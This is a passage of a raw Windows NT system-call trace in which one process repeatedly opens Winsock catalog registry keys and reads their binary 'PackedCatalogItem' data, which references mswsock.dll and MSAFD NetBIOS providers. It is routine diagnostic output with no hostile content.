\0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0E\07\04\02\01\0B\05\0-\07\03\02\0D\0-\04\05\06\07\0-\0A\0\0\0\0\0\204\3\0\0Y\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0Y\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0Z\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\00\0Z\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0[\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0[\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\25\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\374\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0E\07\04\02\01\0B\05\0-\07\03\02\0D\0-\04\05\06\07\0-\0A\0\0\0\0\0\204\3\0\0Y\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0Y\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0Z\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\00\0Z\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0[\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0[\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0[\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\25\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\374\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0E\07\04\02\01\0B\05\0-\07\03\02\0D\0-\04\05\06\07\0-\0A\0\0\0\0\0\204\3\0\0Y\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0Y\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0Z\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\00\0Z\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0[\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0[\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00601   748   NtClose  (80, ... ) == 0x0
 00602   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000010"}, ... 80, ) }, ... 80, ) == 0x0
 00603   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00604   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00605   748   NtAllocateVirtualMemory  (-1, 1351680, 0, 4096, 4096, 4, ... 1351680, 4096, ) == 0x0
 00606   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\26\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\374\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0E\07\04\02\01\0B\05\0-\07\03\02\0D\0-\04\05\06\07\0-\0A\0\0\0\0\0\204\3\0\0_\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0_\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0`\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\01\0`\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0a\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0a\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0b\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\26\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\374\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0E\07\04\02\01\0B\05\0-\07\03\02\0D\0-\04\05\06\07\0-\0A\0\0\0\0\0\204\3\0\0_\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0_\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0`\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\01\0`\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0a\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0a\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0b\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0a\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0b\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\26\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\374\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\0A\0E\07\04\02\01\0B\05\0-\07\03\02\0D\0-\04\05\06\07\0-\0A\0\0\0\0\0\204\3\0\0_\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0_\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0`\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\01\0`\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0a\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0a\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0b\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00607   748   NtClose  (80, ... ) == 0x0
 00608   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000011"}, ... 80, ) }, ... 80, ) == 0x0
 00609   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00610   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00611   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\27\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\375\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\09\07\0C\02\0D\09\0F\04\0-\06\09\05\04\0-\04\0E\0B\03\0-\08\0\0\0\0\0\204\3\0\0d\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0d\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0e\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\02\0e\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0f\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0f\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0g\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\27\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\375\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\09\07\0C\02\0D\09\0F\04\0-\06\09\05\04\0-\04\0E\0B\03\0-\08\0\0\0\0\0\204\3\0\0d\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0d\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0e\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\02\0e\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0f\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0f\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0g\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0f\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0g\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0 (80, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\27\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\375\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\09\07\0C\02\0D\09\0F\04\0-\06\09\05\04\0-\04\0E\0B\03\0-\08\0\0\0\0\0\204\3\0\0d\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0P\0\0\0d\2\0\0\344\1\0\0\354\2\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0e\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0L\0\0\0L\374\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\330r\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\02\0e\2\0\0\344\1\0\0\354\2\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0P\0\0\0f\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0f\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0g\2\0\0\344\1\0\0\354\2\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0P\0\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 00612   748   NtClose  (80, ... ) == 0x0
 00613   748   NtOpenKey  (0x20019, {24, 76, 0x40, 0, 0,  (0x20019, {24, 76, 0x40, 0, 0, "000000000012"}, ... 80, ) }, ... 80, ) == 0x0
 00614   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 00615   748   NtQueryValueKey  (80,  (80, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
